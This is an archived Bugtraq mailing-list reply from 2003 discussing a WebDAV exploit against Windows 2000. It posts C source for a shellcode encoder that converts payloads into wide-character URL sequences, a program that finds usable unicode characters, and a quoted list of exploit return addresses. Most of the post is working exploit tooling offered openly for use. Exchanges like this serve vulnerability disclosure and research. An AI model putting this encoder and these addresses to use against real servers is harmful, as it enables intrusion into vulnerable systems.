Home page logo
/

bugtraq logo Bugtraq mailing list archives

Re: WebDAV exploit: using wide character decoder scheme
From: JW Oh <mat () monkey org>
Date: 27 Mar 2003 01:47:05 -0000

In-Reply-To: <20030326111443.6fb287a3.dave () immunitysec com>


Unfortunately, on my US Windows 2K SP3 build (and I assume all others),
those %u directives get translated into question marks. (0x003F in hex)
:<

I tested it only on Korean version of Windows(Server and Professional 
edition).


This exploit must be much easier to get reliable on other language
versions. A shame, really.

Shame???


Did you use my encoder or did you write your shellcode manually, just
out of curiosity?

The encoding scheme is so simple.

This is the shellcode encoder.

---------------------------------
/*
        mat () monkey org
        mat () panicsecurity org

        Shellcode encoder for webdav exploit.
*/
#include <stdio.h>


int is_special(unsigned char num1)
{
        return (num1==0x3a || num1==0x26 || num1==0x3f || num1==0x25 || 
num1==0x23 || num1==0x20 || num1==0xa || num1==0xd || num1==0x2f || 
num1==0x2b || num1==0xb || num1==0x5c);
}


void main()
{
        int debug=0;
        int rc;
        unsigned char buffer[512];
        while(rc=read(0,buffer,sizeof(buffer)))
        {
                int i;
                for(i=0;i<rc;i++)
                {
                        unsigned int num1=(buffer[i]/2)&0xff;
                        unsigned int num2=(buffer[i]/2)&0xff;

                        if(buffer[i]%2==1)
                        {
                                num2++;
                        }
                        while(is_special(num1) || is_special(num2))
                        {
                                num1++;
                                num2--;
                                if(num2==0)
                                {
                                        printf("error!\n");
                                }
                        }
                        if(buffer[i]==-1)//0xff)
                        {
                                num2=0x2a;
                                if(debug)
                                {
                                        printf("\n%.2x(%4d): ",buffer[i]
&0xff,buffer[i]);
                                }
                                printf("%%u11d5\\x%.2x",num2);
                        }else if(buffer[i]==1)
                        {
                                printf("%%u0411%%u00f0");
                        }else{
                                if(debug)
                                {
                                        printf("\n%.2x(%4d): ",buffer[i]
&0xff,buffer[i]);
                                }
                                printf("\\x%.2x\\x%.2x",num1,num2);
                        }
                }
        }
}

---------------------------------


And this is the code for finding valid unicode characters on my system.


---------------------------------
#include <windows.h>
#include <lm.h>
#include <stdio.h>

int main(int argc, char* argv[])
{
        unsigned char i;
        unsigned char j;

        for(i=0;i<255;i++)
        {
                for(j=0;j<255;j++)
                {
                        char string_to_copy[3];
                        WCHAR src[256]={0,};
                        char dest[256]={0,};

                        string_to_copy[0]=i;
                        string_to_copy[1]=j;
                        string_to_copy[2]=0;
                        memcpy(src,string_to_copy,strlen(string_to_copy));
                        BOOL lpUsedDefaultChar;

                        WideCharToMultiByte
(CP_ACP,0,src,1,dest,256,NULL,&lpUsedDefaultChar);

                        if(!lpUsedDefaultChar)
                        {
                                printf("%.2x%.2x\n",j,i);
                        }
                }
        }

        return 0;
}
---------------------------------


Dave Aitel
Advanced Engineering Directorate
Immunity, Inc.
http://www.immunitysec.com/CANVAS/ "Hacking like it's done in the
movies."

On Wed, 26 Mar 2003 22:55:12 +0900
¿ÀÁ¤¿í <mat () panicsecurity org> wrote:
my @return_addresses=(
"%u32ac%u77e2",
"%uc1b5%u76ae",
"%u005d%u77a5",



  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]